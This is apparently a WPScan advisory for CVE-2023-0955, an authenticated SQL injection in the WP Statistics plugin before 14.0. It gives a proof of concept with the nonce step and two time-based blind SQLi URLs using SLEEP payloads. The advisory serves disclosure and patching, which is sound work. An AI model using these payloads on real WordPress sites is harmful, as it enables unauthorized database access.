WordPress Plugin Vulnerabilities

WP Statistics < 14.0 - Authenticated SQLi

Description

The plugin does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+), however the plugin has a settings to allow low privilege users to access it as well.

Proof of Concept

Log in as a user allowed to View WP Statistic (by default admins, but this can be changed in Statistic > Settings > Roles) and get a nonce via https://a.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URLs below, which will result in a 6s delay

https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name=pages-chart&ago=1&type=a%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(2)))Ab)--%20Cd
https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name=pages-chart&ago=1&ID=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(2)))Ab)--%20Cd

Affects Plugins

Plugin icon
wp-statistics
Fixed in 14.0

References

CVE
CVE-2023-0955

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Submitter website
https://wpscan.com
Verified
Yes
WPVDB ID
18b7e93f-b038-4f28-918b-4015d62f0eb8

Timeline

Publicly Published
2023-03-06 (about 1 years ago)
Added
2023-03-06 (about 1 years ago)
Last Updated
2023-03-06 (about 1 years ago)

Other

Published
Title
Published
2013-02-03
Title
Newsletter < 3.0.9 - SQL Injection
Published
2014-08-01
Title
Profiles <= 2.0RC1 - SQL Injection
Published
2021-07-27
Title
Side Menu Lite < 2.2.6 - Authenticated SQL Injection
Published
2015-02-19
Title
Huge IT Slider < 2.7.0 - SQL Injection
Published
2015-07-15
Title
Auto Affiliate Links < 5.0 - Authenticated Blind SQL Injection